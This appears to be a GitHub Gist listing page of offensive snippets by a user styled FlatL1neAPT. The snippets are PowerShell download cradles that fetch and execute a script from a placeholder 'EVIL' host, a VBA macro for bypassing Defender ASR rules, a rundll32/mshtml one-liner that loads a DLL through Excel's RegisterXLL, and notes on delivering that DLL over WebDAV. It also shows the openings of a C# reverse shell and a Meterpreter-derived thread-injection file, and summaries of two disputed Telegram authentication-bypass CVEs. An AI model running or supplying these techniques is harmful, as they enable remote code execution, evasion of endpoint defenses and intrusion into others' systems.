Instantly share code, notes, and snippets.

View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
View keybase.md

Keybase proof

I hereby claim:

  • I am FlatL1neAPT on github.
  • I am underground (https://keybase.io/underground) on keybase.
  • I have a public key whose fingerprint is E8D6 2068 1BD8 05A9 874A F718 02BC 1C2C 0C68 EDD1

To claim this, I am signing this object:

View ASR Rules Bypass.vba
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
View excel.bat
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
View ExcelXLL.md

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

View Simple_Rev_Shell.cs
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
View sedebug_rtlcreatethread.c
/*! @brief https://github.com/rapid7/meterpreter/blob/master/source/common/arch/win/remote_thread.c */
#include <windows.h>
#include <stdio.h>
typedef DWORD(WINAPI *prototype_RtlCreateUserThread)(
HANDLE ProcessHandle,
PSECURITY_DESCRIPTOR SecurityDescriptor,
BOOL CreateSuspended,
ULONG StackZeroBits,
PULONG StackReserved,
View CVE-2018-15542.txt
> [Description]
> ** DISPUTED ** An issue was discovered in the org.telegram.messenger
> application 4.8.11 for Android. The Passcode feature allows
> authentication bypass via runtime manipulation that forces a certain
> method's return value to true. In other words, an attacker could
> authenticate with an arbitrary passcode. NOTE: the vendor indicates
> that this is not an attack of interest within the context of their
> threat model, which excludes Android devices on which rooting has
> occurred.
>
View CVE-2018-15543.txt
> [Description]
> ** DISPUTED ** An issue was discovered in the org.telegram.messenger
> application 4.8.11 for Android. The FingerprintManager class for
> Biometric validation allows authentication bypass through the callback
> method from onAuthenticationFailed to onAuthenticationSucceeded with
> null, because the fingerprint API in conjunction with the
> Android keyGenerator class is not implemented. In other words, an
> attacker could authenticate with an arbitrary fingerprint. NOTE: the
> vendor indicates that this is not an attack of interest within the
> context of their threat model, which excludes Android devices on which
View keybase.md

Keybase proof

I hereby claim:

  • I am FlatL1neAPT on github.
  • I am underground (https://keybase.io/underground) on keybase.
  • I have a public key whose fingerprint is 0875 D092 F495 5239 6070 0D70 148E 43C4 C8E4 8E2E

To claim this, I am signing this object: